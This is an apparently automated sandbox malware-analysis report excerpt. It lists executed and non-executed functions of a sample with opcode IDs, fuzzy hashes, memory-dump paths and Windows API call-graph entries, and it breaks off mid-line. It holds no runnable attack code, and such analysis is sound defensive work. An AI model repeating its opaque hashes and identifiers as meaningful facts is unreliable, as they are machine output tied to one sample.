            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e299d12a2a6a142551e91b40b257e938a0d38b6edfe935ac7e2de96975222866
            • Instruction ID: 264c5acd90a3b6d048986ce25ff6372ce4375efe3e75e5362afd3cfa6f3c7cf3
            • Opcode Fuzzy Hash: e299d12a2a6a142551e91b40b257e938a0d38b6edfe935ac7e2de96975222866
            • Instruction Fuzzy Hash: FEF03C74A02249EFDB49EFB8F85955CBFB1EF44201B1056ADE805A7385DE341E44DB81
            Function 0523E958 Relevance: .0, Instructions: 30COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e583275387e70f5b6fb0313f9a952a7b8f7bddff12b8d7365881d3814c945316
            • Instruction ID: b0f46ca95d2149799fee480544d8270148e14b22c3834edad2c1a5fc50882fa2
            • Opcode Fuzzy Hash: e583275387e70f5b6fb0313f9a952a7b8f7bddff12b8d7365881d3814c945316
            • Instruction Fuzzy Hash: FDF0F435208640CFC719CB28D699A557BF2EF8971971644D9E14ACB372CB71EC44CB40
            Function 05233310 Relevance: .0, Instructions: 29COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 99ec1295dda858d03b108e6d9ecfea825352d59085f1ce802a08eff0b63c1acb
            • Instruction ID: e97ce2051c624e36400d85ac75ae08f020b41571e0c73cb86fc623d075fc6ad7
            • Opcode Fuzzy Hash: 99ec1295dda858d03b108e6d9ecfea825352d59085f1ce802a08eff0b63c1acb
            • Instruction Fuzzy Hash: 20F0A036301206DBDB09EF38E440CAE7BAEEF863503504569F2088B225DE719C05CBD0
            Function 05233A48 Relevance: .0, Instructions: 29COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 21d16f83255b6ff7ab49fed1c92ed7a547342be6290830ff8e24de798e18ad8a
            • Instruction ID: d35d4d6709f7a2789e387d67f1aa33a2b5424ac2efa18557822f79c51d4a0bc9
            • Opcode Fuzzy Hash: 21d16f83255b6ff7ab49fed1c92ed7a547342be6290830ff8e24de798e18ad8a
            • Instruction Fuzzy Hash: 0DE09BB17006100B5B0CE77EA801466F6DBAFC9610304C17EE40E87715FD759D0156C4
            Function 0523E968 Relevance: .0, Instructions: 28COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5cf713faa19b47cf50c711e4d8e32a2421c062f714ceeadfd65c3452737c8a53
            • Instruction ID: 79119b77cdbf908b84d0e5934f08722a25ca3db742f5628ea06b8235f503c44e
            • Opcode Fuzzy Hash: 5cf713faa19b47cf50c711e4d8e32a2421c062f714ceeadfd65c3452737c8a53
            • Instruction Fuzzy Hash: 36F0DF31210610CFC718DB2CD588D597BEAFF89B1971245A9E10ACB332CBB2EC44CB80
            Function 0523AF51 Relevance: .0, Instructions: 27COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 319d226d803cf42299c18f87d73191e6e01b36bfbf0aec2aa1f0d54606e32c22
            • Instruction ID: 3a23c1dfaf73b1d994694072fd55bb67c1523cd4358a46bbc51ff0bc21409bb4
            • Opcode Fuzzy Hash: 319d226d803cf42299c18f87d73191e6e01b36bfbf0aec2aa1f0d54606e32c22
            • Instruction Fuzzy Hash: 64E048B7A002046BD704CAAAC846ADEBFFDDF84160F14C0BAE84DD7305F6319A414790
            Function 0523E180 Relevance: .0, Instructions: 24COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fc23b74862bbfa21962a42d0a22ec2c996a29ecf3b0833100a0cf3beccdcd81c
            • Instruction ID: 4ec6ad6238b4e170d54a6c97a9f76d311b3a76f4a2716f85a094fa9f63e0d1ef
            • Opcode Fuzzy Hash: fc23b74862bbfa21962a42d0a22ec2c996a29ecf3b0833100a0cf3beccdcd81c
            • Instruction Fuzzy Hash: 3BE0207230834017DB15921DDC41C4BBFD3DFD2310304462FF1158B262EE985C0543D4
            Function 0523C310 Relevance: .0, Instructions: 24COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 90add37b443fecd14e205d24d4b6e7e8f66fba4101f6da532a559f7bd7ff9f8a
            • Instruction ID: 0230457d7d489403decb92240629e6ed6f02783148b836ec0f4a15880a0eddf2
            • Opcode Fuzzy Hash: 90add37b443fecd14e205d24d4b6e7e8f66fba4101f6da532a559f7bd7ff9f8a
            • Instruction Fuzzy Hash: B7E0C2323147149FCB1CDA2CE844D8A7BFDEF8921531885AAF00AD7761DEA0FC0A4794
            Function 05233A38 Relevance: .0, Instructions: 24COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 896f072fd17b2c2a6c352df0f8da79a6dfd7d71cdd50bab60a65ab6c721a97e7
            • Instruction ID: 6dd21f1bb0b5c38760167307de351e2357e4af81f73d1ba7aaa6aa5a29eb15a0
            • Opcode Fuzzy Hash: 896f072fd17b2c2a6c352df0f8da79a6dfd7d71cdd50bab60a65ab6c721a97e7
            • Instruction Fuzzy Hash: 97E026A260070027C318AA3ACC026A6BBAAAFC5600B08C56ED48B83705F834A80182D1
            Function 05239789 Relevance: .0, Instructions: 23COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 82dac90b3583abc4a5242a91e4952a01fe45c3996408440eae48f5990dbe4967
            • Instruction ID: 0cf64732325333e1e41bd7bc95824bd1242bf368a43a2b5e0c7602b4a0344242
            • Opcode Fuzzy Hash: 82dac90b3583abc4a5242a91e4952a01fe45c3996408440eae48f5990dbe4967
            • Instruction Fuzzy Hash: A5E092B6A01209EBD700FFA4F851A5D7B79FB40304F504958E80593346DA355E059B50
            Function 052332B8 Relevance: .0, Instructions: 23COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 07cf55ef572b290d1773eda1103874723f2153f0ea0e004559d92a158a5d7aff
            • Instruction ID: 9418c0b9ed7f1f29983921ab16b7c7d1042de6592fe98339ebd3ab5726765927
            • Opcode Fuzzy Hash: 07cf55ef572b290d1773eda1103874723f2153f0ea0e004559d92a158a5d7aff
            • Instruction Fuzzy Hash: 3CF0C9B5D0110CEFCB00DFA4D8896CDFBB4EF58300F1082A6D805E3245EA305B559B81
            Function 05232ACC Relevance: .0, Instructions: 23COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6121505d303ec8543dfafb7c0dac3d2df5bdf0d942eaffcafb6478f1a067f090
            • Instruction ID: f8a3a581a12365dcf2004be15dfed5d947b148f9e63112fb36e7ff13c1f441db
            • Opcode Fuzzy Hash: 6121505d303ec8543dfafb7c0dac3d2df5bdf0d942eaffcafb6478f1a067f090
            • Instruction Fuzzy Hash: 11E0C2303247149FC71CDE1CE880D6A77EAEF88310350896EF10AE3360CEA0FC084684
            Function 05235DA4 Relevance: .0, Instructions: 22COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9ce56c741f5c6b03a45209da6de1f4e996309ab056ea9188da8159560e06aa3e
            • Instruction ID: 73a4c538a82da2c8e2612201fe949981dc30eb07f8c20e94762eedeab2dc1f64
            • Opcode Fuzzy Hash: 9ce56c741f5c6b03a45209da6de1f4e996309ab056ea9188da8159560e06aa3e
            • Instruction Fuzzy Hash: B5F0C9B6B2120DCFCB14EFA4E54A5ECB7B2FF48251F2000A9D00AB7290CB365E41CB60
            Function 052310F8 Relevance: .0, Instructions: 20COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fd21dab35030b2a229009625cb9f7783403aabe3c9785883f75e8eb3471a5d68
            • Instruction ID: 26d608f21370a220b64f736a022413a466cba25eb6b771494e7fe01da6f9380e
            • Opcode Fuzzy Hash: fd21dab35030b2a229009625cb9f7783403aabe3c9785883f75e8eb3471a5d68
            • Instruction Fuzzy Hash: 5DD0A7313142395B8B1477B578089AE37ADAA4456A310047AE50EC3310DEA1890193C4
            Function 05239798 Relevance: .0, Instructions: 19COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d448a6b8c0cee1f84a9d5ff8b306c2f00f3d8f1a3bc1d8c497217de67c616b11
            • Instruction ID: 14aa8e89992f5038074b3076cc25fe9151214f982fa177aca2ca894bc051a4f7
            • Opcode Fuzzy Hash: d448a6b8c0cee1f84a9d5ff8b306c2f00f3d8f1a3bc1d8c497217de67c616b11
            • Instruction Fuzzy Hash: E4E08C76A01309EFCB00FFA4F81185DBBB9FB44304B208A99E805A3314DB326F04DB50
            Function 05234251 Relevance: .0, Instructions: 19COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a45c4ca3d227715e22994d799c94b226a5b6f42fdd41b02aa9b5776cb6699992
            • Instruction ID: 19dff5e0c1e0e6af471aee20a1c241d2c1878b81b700b463ac8642dab03e4a7d
            • Opcode Fuzzy Hash: a45c4ca3d227715e22994d799c94b226a5b6f42fdd41b02aa9b5776cb6699992
            • Instruction Fuzzy Hash: 71E017366101249FC7009B68E849A9ABBA9EF49720B268066F905C7361DE71ED118B98
            Function 052332C8 Relevance: .0, Instructions: 19COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4342e8453f74154f10af278f2586c2523d1910c5c78b6182761b6e570fb18cbd
            • Instruction ID: 6399a86261d21cb58fbba6cd6633e87f6366cbdf3bd8ce2b4d3b25e1ce1bdfca
            • Opcode Fuzzy Hash: 4342e8453f74154f10af278f2586c2523d1910c5c78b6182761b6e570fb18cbd
            • Instruction Fuzzy Hash: 6EE07575D0120CEFCB40DFE4D5499DDFBB5EB48200F1082A6D815E3245EA305B559B80
            Function 052310E8 Relevance: .0, Instructions: 17COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7964b994577605b8165147d0ad28bfeb8fcd82de75fa354dde74ea8ec998afd2
            • Instruction ID: c30544773ba1f35ae5e57d827ff4b4eae1d86809739734c368580b31af3aa2ae
            • Opcode Fuzzy Hash: 7964b994577605b8165147d0ad28bfeb8fcd82de75fa354dde74ea8ec998afd2
            • Instruction Fuzzy Hash: F0D0C03332402417DB005A6AEC02BD337EDFF00951F110435E008E3300FAB5F61241D8
            Function 05234260 Relevance: .0, Instructions: 15COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 780425f7d699124dffaf341a5152878eb7e4388b50abf7c2657ca79c3a62539d
            • Instruction ID: 798275cd7b5f6f3df6751e5e14fcb13ba0027492bd19854f56105dbe04231733
            • Opcode Fuzzy Hash: 780425f7d699124dffaf341a5152878eb7e4388b50abf7c2657ca79c3a62539d
            • Instruction Fuzzy Hash: 3AD0C9363101249F87049B68E418CAABFE9EF4D6617118066FD09C7361DE71DC108BD4
            Function 05230B01 Relevance: .0, Instructions: 15COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8387bab9c085bf56001094cd26dfcd8e2c5aefa826fbe7837b2eb5d5c441424b
            • Instruction ID: 84e23509f0465fd4bb1b3ac518f7cba7f78fa38b0aa2eb2233bcf32d5a4a616f
            • Opcode Fuzzy Hash: 8387bab9c085bf56001094cd26dfcd8e2c5aefa826fbe7837b2eb5d5c441424b
            • Instruction Fuzzy Hash: 7CD01C36100009AFCB00CFA0DA06FA637AAFF48714F0484A5F64887222C232DA22DB60
            Function 05230B10 Relevance: .0, Instructions: 12COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
            • Instruction ID: 103967bf13f508402a192ef6221732069224ae084a114efb1bafc53f37aadea3
            • Opcode Fuzzy Hash: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
            • Instruction Fuzzy Hash: BCD0C93614010CEFCB01CF95D844D9A3BBAFF48720F008054FA084B232C332E821EB90
            Function 05231200 Relevance: .0, Instructions: 8COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 915582f0bf5f12db4c0e295064c11f36e58e0d2cfe0724afcd45905516971b55
            • Instruction ID: 65280fdd38fdfa4e21ff0e7ec0a72173b8b104fee75b9fb127456f85abdb9bab
            • Opcode Fuzzy Hash: 915582f0bf5f12db4c0e295064c11f36e58e0d2cfe0724afcd45905516971b55
            • Instruction Fuzzy Hash: FBB012EBA3010802DB00D1318CC6B55031267D0500FFED414460080145D578810F2110

            Non-executed Functions

            Function 073995A8 Relevance: .3, Instructions: 349COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 687b6a4cd4794c8fc5203ff60703e83c6dd80c7669bda5750fe600b3ffbfead9
            • Instruction ID: 1e2f623794144079052ba210f331217f6d3e9b3b647ba86ad55f507c6460e891
            • Opcode Fuzzy Hash: 687b6a4cd4794c8fc5203ff60703e83c6dd80c7669bda5750fe600b3ffbfead9
            • Instruction Fuzzy Hash: 86D1ABB17016018FEB29DB75C8507AEB7EAAFC9300F14447DE14A8B2A1DF35E905CB52
            Function 07390C80 Relevance: .3, Instructions: 312COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4586791c8fa1f6e8543a61434b1bbf9a2c011e0af6591c9eba60cdccc3193b00
            • Instruction ID: 806391187c44cc9dc49a445b9a5a567868498b6798ee5d6dff3c0a729d5ed2bd
            • Opcode Fuzzy Hash: 4586791c8fa1f6e8543a61434b1bbf9a2c011e0af6591c9eba60cdccc3193b00
            • Instruction Fuzzy Hash: 01E12CB4E0025A8FDB54DFA8C580AAEFBB2FF49304F248169D418A7355D731AD42CFA1
            Function 073914F0 Relevance: .3, Instructions: 312COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7344ab0d52527091dd2032d285dbd20a7ee47b5317766a7e14826091e52841d3
            • Instruction ID: a94fee3262633cd7ece605e062e20a7636e43e10a62e2718601d60ab2c3463a7
            • Opcode Fuzzy Hash: 7344ab0d52527091dd2032d285dbd20a7ee47b5317766a7e14826091e52841d3
            • Instruction Fuzzy Hash: 8CE10BB4E1025A8FDB54DF99C580AAEFBB2FF89304F248169D418A7355D730AD42CFA1
            Function 07391928 Relevance: .3, Instructions: 312COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 36fd23d038ae887a8fe4ead3bbd1a53e07834ba201a54bbc626a4af886abefde
            • Instruction ID: 921ceeca6da5110f386083108df0893a45de478029929f7c73bcaabed657e380
            • Opcode Fuzzy Hash: 36fd23d038ae887a8fe4ead3bbd1a53e07834ba201a54bbc626a4af886abefde
            • Instruction Fuzzy Hash: 73E1FDB4E1025A8FDB54DFA9C580AAEFBB2FF49304F248169D418A7355D7309D42CFA0
            Function 07393188 Relevance: .3, Instructions: 312COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6181777cf00ccaf7186b8fba3e7fc059e7ccffdf8b49757919722e38d83b859f
            • Instruction ID: 133f6bd0227b394f0e5ced77bb45570995c07fbddd0955512816d9b110e656ad
            • Opcode Fuzzy Hash: 6181777cf00ccaf7186b8fba3e7fc059e7ccffdf8b49757919722e38d83b859f
            • Instruction Fuzzy Hash: D2E1FCB4E102598FDB54DFA9C580AAEFBF2FF89304F248169D418A7355D731A942CFA0
            Function 073910B8 Relevance: .3, Instructions: 312COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bc6be538751023417cbeb8d543e9c632121c28dc6d76ae7471f29bfc60343dad
            • Instruction ID: 310c5df69e72bd453d82c13757498e7be62462f477ee568273d27a2e4060d151
            • Opcode Fuzzy Hash: bc6be538751023417cbeb8d543e9c632121c28dc6d76ae7471f29bfc60343dad
            • Instruction Fuzzy Hash: DDE1FCB4E0025ACFDB54DF99C580AAEFBB2FF89304F248169D418A7355D771A942CFA0
            Function 00FAEF24 Relevance: .3, Instructions: 264COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 296a6107157ef4621610c194c1e22da906a376109df5a81cd7ed6127885be8d2
            • Instruction ID: 6f9f45c6f4acf9814520bf45abc21236812337066fc0d8510d06bbc8ac0a4879
            • Opcode Fuzzy Hash: 296a6107157ef4621610c194c1e22da906a376109df5a81cd7ed6127885be8d2
            • Instruction Fuzzy Hash: 55A18F72E102098FCF15DFB4D84499EBBB2FF86310B15857AE806AF265DB35E906DB40
            Function 05235A27 Relevance: .2, Instructions: 226COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 23257ba9b68daba1ae451312d94ceb7fcd047c27b8beb788e3b418752e5df946
            • Instruction ID: 432c6ccd44821f7817852f9ddec23a9142657999225b26cac4596d104c063b2d
            • Opcode Fuzzy Hash: 23257ba9b68daba1ae451312d94ceb7fcd047c27b8beb788e3b418752e5df946
            • Instruction Fuzzy Hash: F571A8B2A1DAD4A7D726E3B8C4922CCBF328E9F020F9C55CDC681926D3D4C2C496D785
            Function 07390C5F Relevance: .1, Instructions: 141COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d9cdf785914ad1118705e23f14bec7d89411d04a9049168a048e69dbc9020640
            • Instruction ID: 6d69b9285a9e42a5b4c771faa140944b8eca644c6746ccbf2468d50b93030362
            • Opcode Fuzzy Hash: d9cdf785914ad1118705e23f14bec7d89411d04a9049168a048e69dbc9020640
            • Instruction Fuzzy Hash: 89515FB5E0425A8FDB14CFA9C5805AEFBF2FF89300F24816AD448A7316D7309942CFA1
            Function 0739191B Relevance: .1, Instructions: 134COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bbb54715177217a1de52564b1104ece500618310d3943420d2a9a774c8594d26
            • Instruction ID: a45892b698796800e01648d0b6e7ce606b3239ee4b13be3a32a54ffddca68638
            • Opcode Fuzzy Hash: bbb54715177217a1de52564b1104ece500618310d3943420d2a9a774c8594d26
            • Instruction Fuzzy Hash: C1510AB4E1125A8FDB14CFA9C5805AEFBF6BF89300F248169D418A7355D7319D42CFA0

            Execution Graph

            Execution Coverage:11.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:371
            Total number of Limit Nodes:28
            execution_graph 51949 7108340 51951 14a82f7 2 API calls 51949->51951 51952 14a5d04 2 API calls 51949->51952 51950 7108353 51951->51950 51952->51950 51953 710c541 51954 710c556 51953->51954 51957 710c557 51953->51957 51964 710c568 51953->51964 51958 710c593 51957->51958 51959 710c58c 51957->51959 51963 710c5ba 51958->51963 51971 710ad4c 51958->51971 51959->51954 51962 710ad4c GetCurrentThreadId 51962->51963 51963->51954 51965 710c593 51964->51965 51966 710c58c 51964->51966 51967 710ad4c GetCurrentThreadId 51965->51967 51970 710c5ba 51965->51970 51966->51954 51968 710c5b0 51967->51968 51969 710ad4c GetCurrentThreadId 51968->51969 51969->51970 51970->51954 51972 710ad57 51971->51972 51973 710c8cf GetCurrentThreadId 51972->51973 51974 710c5b0 51972->51974 51973->51974 51974->51962 51857 14a4668 51858 14a467a 51857->51858 51859 14a4686 51858->51859 51863 14a4778 51858->51863 51868 14a3e0c 51859->51868 51861 14a46a5 51864 14a479d 51863->51864 51872 14a4888 51864->51872 51876 14a4879 51864->51876 51869 14a3e17 51868->51869 51884 14a5c84 51869->51884 51871 14a7048 51871->51861 51874 14a48af 51872->51874 51873 14a498c 51874->51873 51880 14a4514 51874->51880 51877 14a4888 51876->51877 51878 14a4514 CreateActCtxA 51877->51878 51879 14a498c 51877->51879 51878->51879 51881 14a5918 CreateActCtxA 51880->51881 51883 14a59db 51881->51883 51885 14a5c8f 51884->51885 51888 14a5ca4 51885->51888 51887 14a70ed 51887->51871 51889 14a5caf 51888->51889 51892 14a5cd4 51889->51892 51891 14a71c2 51891->51887 51893 14a5cdf 51892->51893 51894 14a5d04 2 API calls 51893->51894 51895 14a72c5 51894->51895 51895->51891 51900 14ad688 DuplicateHandle 51901 14ad71e 51900->51901 51783 7104288 51784 71042e1 51783->51784 51788 14a82f7 51784->51788 51794 14a5d04 51784->51794 51785 710431a 51789 14a8343 51788->51789 51791 14a85cb 51789->51791 51800 14aac78 51789->51800 51790 14a8609 51790->51785 51791->51790 51804 14acd60 51791->51804 51795 14a5d0f 51794->51795 51797 14a85cb 51795->51797 51798 14aac78 2 API calls 51795->51798 51796 14a8609 51796->51785 51797->51796 51799 14acd60 2 API calls 51797->51799 51798->51797 51799->51796 51809 14aac9f 51800->51809 51813 14aacb0 51800->51813 51801 14aac8e 51801->51791 51805 14acd91 51804->51805 51806 14acdb5 51805->51806 51836 14ad319 51805->51836 51840 14ad328 51805->51840 51806->51790 51810 14aacb0 51809->51810 51816 14aada8 51810->51816 51811 14aacbf 51811->51801 51815 14aada8 2 API calls 51813->51815 51814 14aacbf 51814->51801 51815->51814 51817 14aadb9 51816->51817 51819 14aaddc 51816->51819 51817->51819 51824 14ab040 51817->51824 51828 14ab031 51817->51828 51818 14aadd4 51818->51819 51820 14aafe0 GetModuleHandleW 51818->51820 51819->51811 51821 14ab00d 51820->51821 51821->51811 51825 14ab054 51824->51825 51827 14ab079 51825->51827 51832 14aa188 51825->51832 51827->51818 51830 14ab040 51828->51830 51829 